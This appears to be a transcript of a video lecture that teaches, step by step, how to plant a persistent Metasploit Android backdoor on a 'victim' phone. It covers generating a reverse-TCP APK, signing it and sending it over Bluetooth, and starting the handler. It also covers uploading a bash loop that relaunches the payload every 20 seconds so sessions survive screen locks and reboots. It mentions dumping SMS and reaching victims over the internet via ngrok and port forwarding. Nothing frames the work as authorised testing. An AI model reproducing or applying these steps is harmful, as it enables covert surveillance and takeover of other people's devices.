Now you might be having a question, like every time victim turns off his device, the session gets disconnected, right? Okay, so in this video lecture, I'll show you how attackers make the backdoor persistent in the victim's device. So type nano and the file name, say syslog.sh, and hit enter. Okay, so nano is not installed. Okay, so we'll just simply install nano, pkg install nano. Alright, so our nano has been successfully downloaded. We'll quickly write a short bash script. So the first line, hash bin bash. Yeah, it is important as it recognizes the script as a bash shell script. So hash exclamation mark / bin / bash. It defines that it's a bash shell script. So we're using a while loop. While true, do start the user android.intent.action. So this is the action which the Android system gonna take as an action.main. Do you remember? I mean, every time when we install, it shows main activity. Yes, so this is the main activity which will, we have written sleep 20. So after every 20 seconds, this main activity will be triggered. This bash script will be, updating. I mean, we'll be sending this to our victim, and this will update after after every 20 seconds. This bash script will update the main activity, will trigger the main activity. So our session will be, keep on created after 20 seconds. So we'll just write cat syslog.sh and we'll see once again if our whatever we have written inside the bash script is okay or not. So we'll just copy it to SD card. Now the rest procedure is all same. Okay, we'll go to the Metasploit folder. Since we have copied that to our SD card because we'll be uploading from our SD card. From the attacker's internal storage, we'll be updating or uploading to our victim's storage. Okay, so yeah, we are inside the Metasploit framework now, and we'll follow the same procedure as we used to do. You remember, right? We have given our sleep time like 20 seconds. Like after every 20 seconds, it will trigger the main activity. So whether it is logged, turned on, turned off, it will work. This bash script will make our app persistent, and a session will be created after every 20 seconds or 40 seconds, whatever you can change the time. So the IP will just copy this IP. Make sure you are connected to WLAN. This is the same thing as we did for you remember LAN. Yeah, so same. So LHOST, you'll give the IP address, then LPORT 4444 -O, then SD card, and the location, say Z1 or whatever, Z persistent, you can say persist.apk. Okay, so our persist.apk has been generated. So simply we'll again sign that apk and send it via Bluetooth. So as you can see, we are inside our victim's device. So incoming file z persist -signed apk. Install the file. Same procedure as we did earlier. So now as you can see, scanning is also done and the app has been successfully installed. So we'll come back to our attacker's device. Now we are inside the attacker's device. We'll simply write msf console and hit enter. Okay, so our Metasploit framework has started. First we'll check if our database is connected or not. So db_database status, yes, connection connected to msf database. Yeah, so again the same procedure, use exploit multi-handler. Just a second, I guess again there is some spelling error. So use exploit, Yes, there was some error in the typing the command. Alright, then we'll use the set payload Android Meterpreter. It's almost the same, we are doing. So first we tried for LAN, then we tried for WAN. Then while we are trying for WAN, first time we did with the just a second, we'll first complete this. So set LHOST. So LHOST will be the IP of WLAN. Simply copy and paste it, and then LPORT. You remember the LPORT which it's very simple, right? 4444, yeah. And then exploit. Sorry, again command, some error in the command. So after set you must give a space as well, okay? So set space LPORT 4444. Next we just need to type exploit and hit enter. Make sure your victim has installed the app, so that it would be easy for us to get the session. Alright, as you can see, the session is getting created. Yes, now we are successfully inside our victim's device. So now what we need to do, we need to upload our syslogs.sh bash script to our victim's device to make the connection, to make the session persistent. So simply if you type ls, there is some error running, ls timeout error. Also our session, okay, our session has been closed because our victim must have locked the screen or rebooted the system. So again we'll start the session, we'll type exploit and hit enter. For this reason we are making this session to be persistent, okay? So again we'll type ls, no entry exists, there may be some no entries exist in data, okay? So we'll come there is no files, okay? We'll come again here. So we'll type sysinfo, we'll get the information about our victim's device, as we have already used this command. So now it's time to upload the syslogs.sh, right? Let's do the cd/sd card. We are going inside the internal storage of our victim's device, right? Okay, so now we are inside our victim's SD card, that is internal storage, since we have changed the directory to /SD card. Okay, so the reason why we didn't get anything while we gave the command ls, because earlier we were not inside the internal storage of our victim's device. Now since we have changed the directory cd and /SD card, now we are inside the internal storage of our victim's device. So now if we do ls, we'll get the list of all the files and directories of our victim's device, right? Type ls and hit enter. Now you can see all the files and folders inside our victim's device. Okay, so now it's time, ultimate time to upload this syslogs.sh, okay? So now since we are inside our internal storage of our victim's device, simply write upload /SD card /syslogs.sh. So this is from our internal storage. So this first /SD card was our internal storage. Now we are giving the last /SD card is our victim's internal storage, okay? And hit enter. As you can see, it has been successfully uploaded. Now next we'll type ls and hit enter to check whether our syslogs.sh has been successfully uploaded or not in our victim's device. As you can see, syslog.sh, yes, it has successfully been uploaded in our victim's device. Now next we need to type shell, as we need to execute this inside the shell of our victim. You remember shell, right? You can refer to the earlier videos and reading materials. So yeah, we are inside shell and type ls. As you can see, we are inside our shell. Syslogs.sh has successfully been, okay. So now we'll type sh syslogs.sh and hit enter. So now you can see our bash script has started. So after every 20 seconds it will trigger the main activity. So this is how our session will be persistent. As you can see, after every second the main activity is triggered, right? So you can just lower down the seconds. You can also make it to 10, 20, 30, 40 seconds, whatever you feel like comfortable for you. Okay, so after every 20 seconds you will see again a trigger will be coming up. Just wait for 20 seconds. Yeah, again after 20 seconds you can see a trigger is coming up. So now to stop this process, press Ctrl plus C. So this triggering will stop. So yeah, remember one thing. Now this time your victim is not required to every time click that app. Automatically this once this bash script have been uploaded, so it will automatically trigger. So yes, Control C and Y, you are out from this shell. Now you can perform all the tasks which you used to do earlier for the LAN and WAN and everything. So you can just simply type help. You will see all the commands there to execute. You can simply dump the SMS and everything. As you can see, Meterpreter session 2 closed. Reason, the session is died. So once again, whatever is it, you can see the session is getting closed. It's no problem. Again, if you type exploit and hit enter, you will successfully get the session. Okay, you can also type sessions and hit enter to see whether your session is currently present or your session is died. As you can see, after writing session and hit enter, it is showing no active session. So simply write exploit, you will get the session back. Started reverse TCP and you can see your session is active again. So perform, yes, with the help, type help command and perform all the things which we have learned. Again, no problem. If a session is getting died, no problem. Again, you can type exploit and you will get back the session. So at times you may face problem if victim's device is above Android version 8 because background process gets killed by the Android. So on that case, you need to again and again click the app and it will start working. No worries. Now you can use, like, if you want to know the sysinfo, just type sysinfo and you're getting all the details. Now a quick recap. What we did: first we tried for the LAN, then we tried for the WAN. In WAN we tried with ngrok. So first ngrok we tried with data pack on along with the hotspot, but most of the time our hotspot, in my case my hotspot was getting turned off, so I was not able to create to generate the exploit and generate the payload. So for the next time, what we did, next time we again again we removed the files of ngrok and again we downloaded the file and again we tried with the help of Wi-Fi, so it successfully worked for us. So for LAN we have one method, for WAN we have two methods. Whatever method suits you, your device, it's perfectly fine. And the last one what we learned is to make, for the WAN we did port forwarding as well. Okay, so we learned port forwarding as well. And the last last we learned how to make our APK persistent, so that whenever if our victim is turning off her system or not using the main not clicking the app, it's perfectly fine. Or he or she is switching, just locking her device. Again, after every 20 seconds our bash script is running and triggering the main activity. So yeah, we are getting back the sessions. We can see like many times it is getting died, but again we are not required to write the full script. We are not required to do the full procedure. Just type exploit and again we'll get the session back. So these are the few 3 or 4 important things which we came across with the help of Metasploit. Thank you so much. I'll see you in the next class.